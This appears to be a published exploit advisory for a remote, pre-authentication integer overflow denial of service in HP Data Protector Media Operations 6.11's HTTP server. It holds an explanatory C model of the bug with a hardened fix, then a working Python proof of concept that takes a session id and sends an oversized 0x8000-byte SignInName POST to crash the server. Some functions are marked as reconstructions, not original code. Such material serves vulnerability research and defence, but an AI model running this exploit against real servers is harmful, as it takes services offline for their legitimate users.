HP Data Protector Media Operations 6.11 HTTP Server
  Published: 10/26/2010

# Exploit Title: HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
# Date: 17/09/10
# Author: d0lc3 (@rmallof http://elotrolad0.blogspot.com/)
# Software Link: http://www.hp.com
# Version: 6.11
# Tested on: Windows XP SP3 Spa
#
#Summary:
"""
HP Data Protector Media Operations ships with an embedded HTTP server that gives
users access to the application over this protocol.

A flaw was found in this implementation that allows a remote, pre-authentication
DoS: an integer overflow in the handling of the length of a string sent through
the POST method.

The integer overflow causes an unexpected variable initialisation (reset to 0),
followed by a dereference of that variable (NULL dereference), crashing the server
and thus denying service to legitimate users.

This is not exploitable beyond the denial of service.
"""
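The failure mode the summary describes (a field length of 0x8000 or more overflowing an integer, the affected variable coming back as 0/NULL, then being dereferenced) fits the signature of a length that is narrowed to a signed 16-bit value: 0x7fff is the largest positive value such a variable holds, and 0x8000 wraps to -32768. The C below is an added illustrative model of that bug class next to its hardened form; it is not HP's code (the server is closed source), and the 16-bit narrowing, the `MAX_FIELD` limit and the function names are assumptions. The vulnerable version returns 0 on the path where the real server would fault on the NULL pointer, so it can be exercised without crashing.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed upper bound for a login field; the real server's limit is unknown. */
#define MAX_FIELD 0x1000

/* Narrow a request length to a signed 16-bit field the way two's-complement
 * hardware does: 0x7fff stays 32767, 0x8000 becomes -32768. The arithmetic is
 * spelled out so the result does not depend on the compiler. */
int16_t narrow_len(size_t body_len)
{
    int v = (int)(body_len & 0xffffu);
    if (v >= 0x8000)
        v -= 0x10000;
    return (int16_t)v;
}

/* Vulnerable pattern (model of the bug class in the advisory): the buffer
 * pointer is only set up when the narrowed length is positive, so a field of
 * 0x8000 bytes leaves it NULL and the copy dereferences NULL. This model
 * returns 0 where the real server would fault.
 * Returns 1 on a completed copy, 0 on the NULL-dereference path. */
int vuln_handle(const char *field, size_t field_len, char *out, size_t out_sz)
{
    int16_t len = narrow_len(field_len);  /* the overflow happens here */
    char *dst = NULL;
    if (len > 0 && (size_t)len < out_sz)  /* out_sz test only keeps this model in bounds */
        dst = out;
    if (dst == NULL)
        return 0;                          /* real code: memcpy(dst, ...) on NULL */
    memcpy(dst, field, (size_t)len);
    dst[len] = '\0';
    return 1;
}

/* Hardened form: validate the full-width length before any narrowing or
 * buffer setup, and reject rather than truncate. Returns 1 or -1. */
int safe_handle(const char *field, size_t field_len, char *out, size_t out_sz)
{
    if (field_len > MAX_FIELD || field_len >= out_sz)
        return -1;
    memcpy(out, field, field_len);
    out[field_len] = '\0';
    return 1;
}

/* Stand-alone demo: feed the PoC's 0x8000-byte SignInName value to both versions. */
int main(void)
{
    static char out[0x10000];
    char *field = malloc(0x8000);
    if (!field)
        return 1;
    memset(field, 'A', 0x8000);           /* constructed input, same as the PoC's "A"*0x8000 */

    printf("narrow_len(0x7fff)  = %d\n", narrow_len(0x7fff));
    printf("narrow_len(0x8000)  = %d\n", narrow_len(0x8000));
    printf("vuln_handle(0x7fff) = %d\n", vuln_handle(field, 0x7fff, out, sizeof out));
    printf("vuln_handle(0x8000) = %d  (NULL dereference path)\n",
           vuln_handle(field, 0x8000, out, sizeof out));
    printf("safe_handle(0x8000) = %d  (rejected before narrowing)\n",
           safe_handle(field, 0x8000, out, sizeof out));
    free(field);
    return 0;
}
```

The point of the hardened version is ordering: the length is checked while it is still full width, so no narrowed copy of it ever exists to go negative, and an oversized field is refused with an error rather than silently truncated.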
#PoC:

#!/usr/bin/env python3

import os
import socket
import sys
import time

# global vars
neg = b"GET / HTTP/1.1\r\n\r\n"   # first request; the reply carries the session id
lim0 = "Location:"                 # header whose URL contains the session
lim1 = "&"                         # delimiter that ends the session value
lim2 = "sess="                     # delimiter that starts the session value
# SignInName of 0x8000 bytes: a length >= 0x8000 is what triggers the int overflow
buf = "SignInName=" + ("A" * 0x8000) + "&SignInPassword=FOO&Sign+In=Log+In"


def CV():  # banner
    os.system("clear")
    print("\t-HP Data Protector Media Operations 6.11-")
    print("\t    -HTTP Remote Denial of Service-")
    print("\n[+] Researcher:\tRoi Mallo (@rmallof)")
    print("[+] Blog:\thttp://elotrolad0.blogspot.com/")
    print("[+] Twitter:\thttps://www.twitter.com/rmallof")
    print("\n\n")


def nego(h):  # starting connection and getting session
    s = socket.socket()
    try:
        s.connect(h)
    except OSError:
        print("[x] Error connecting to remote host!")
        sys.exit(0)
    s.sendall(neg)
    time.sleep(1)
    rec = s.recv(1024)
    s.close()
    return rec.decode("latin-1")


def getSession(rec):  # cut the session id out of the Location header
    # Reconstruction: the original listing continues on its next page. The
    # delimiters lim0/lim1/lim2 above imply a reply of the form
    # "Location: ...?sess=<id>&...", which is what is parsed here.
    i = rec.find(lim0)
    if i < 0:
        print("[x] No Location header in reply, cannot get a session!")
        sys.exit(0)
    i = rec.find(lim2, i)
    if i < 0:
        print("[x] No sess= parameter in Location header!")
        sys.exit(0)
    i += len(lim2)
    j = rec.find(lim1, i)
    if j < 0:
        j = rec.find("\r\n", i)  # sess= is the last parameter
    if j < 0:
        j = len(rec)
    return rec[i:j]


def buildPOST(s, h, p, b):  # building the POST request that crashes the server
    P = "POST /4daction/wHandleURLs/handleSignIn?sess=" + s + "&siteCode=0&lang=en& HTTP/1.1\r\n"
    P += "Host: " + h + "\r\n"
    P += "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\r\n"
    P += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    P += "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
    P += "Accept-Encoding: gzip,deflate\r\n"
    P += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
    P += "Keep-Alive: 115\r\n"
    P += "Connection: keep-alive\r\n"
    P += "Referer: http://" + h + p + "\r\n"
    P += "Content-Type: application/x-www-form-urlencoded\r\n"
    P += "Content-Length: %d\r\n" % len(b)  # b is ASCII, so chars == bytes
    P += "\r\n"
    P += b
    return P.encode("latin-1")


def main():
    # Reconstruction: the original main() is on the next page of this listing
    # and is rebuilt here from the helpers above; the <host> <port> argument
    # layout and the "/" Referer path are assumptions.
    if len(sys.argv) != 3:
        print("Usage: %s <host> <port>" % sys.argv[0])
        sys.exit(0)
    host, port = sys.argv[1], int(sys.argv[2])
    CV()
    print("[+] Getting a session from %s:%d ..." % (host, port))
    sess = getSession(nego((host, port)))
    print("[+] Session: " + sess)
    P = buildPOST(sess, host, "/", buf)
    print("[+] Sending %d-byte POST (SignInName = 0x8000 bytes) ..." % len(P))
    s = socket.socket()
    s.connect((host, port))
    s.sendall(P)
    time.sleep(1)
    s.close()
    print("[+] Done, the HTTP server should be down.")


if __name__ == "__main__":
    main()
